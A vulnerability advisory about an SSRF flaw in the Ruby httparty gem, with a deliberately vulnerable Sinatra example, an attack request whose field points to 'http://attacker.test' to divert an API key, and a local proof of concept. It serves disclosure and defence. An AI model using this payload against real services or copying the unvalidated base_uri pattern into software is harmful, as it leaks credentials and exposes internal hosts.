PT-2025-54707 — SSRF in Rubygems Httparty

PT-2025-54707 · Rubygems · Httparty

Published

2025-12-23

Updated

2025-12-23

CVSS v3.1

8.2

High

Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Summary

There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.

Details

When httparty receives a path argument that is an absolute URL, it ignores the base uri field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.

Consider the following example of a web application:

require 'sinatra'
require 'httparty'

class RepositoryClient
 include HTTParty
 base uri 'http://exmaple.test/api/v1/repositories/'
 headers 'X-API-KEY' => '1234567890'
end

post '/issue' do
 request body = JSON.parse(request.body.read)
 RepositoryClient.get(request body['repository id']).body
 # do something
 json message: 'OK'
end

Now, suppose an attacker sends a request like this:

POST /issue HTTP/1.1
Host: localhost:10000
Content-Type: application/json

{
  "repository id": "http://attacker.test",
  "title": "test"
}

In this case, httparty sends the X-API-KEY not to http://example.test but instead to http://attacker.test.

A similar problem was reported and fixed in the HTTP client library axios in the past: https://github.com/axios/axios/issues/6463

Also, Python's urljoin function has documented a warning about similar behavior: https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin

PoC

Follow these steps to reproduce the issue:

Set up two simple HTTP servers.

bash

mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &

Create a script (for example, main.rb):

require 'httparty'

class Client
 include HTTParty
 base uri 'http://localhost:10001'
end

data = Client.get('http://localhost:10002').body
puts data

Run the script:

bash

$ ruby main.rb
this is server2

Although base uri is set to http://localhost:10001/, httparty sends the request to http://localhost:10002/.

Impact

Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.
SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
Affected users: Any software that uses base uri and does not properly validate the path parameter may be affected by this issue.

Exploit

Fix

SSRF

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-918

Related Identifiers

GHSA-HM5P-X4RQ-38W4

Affected Products

Httparty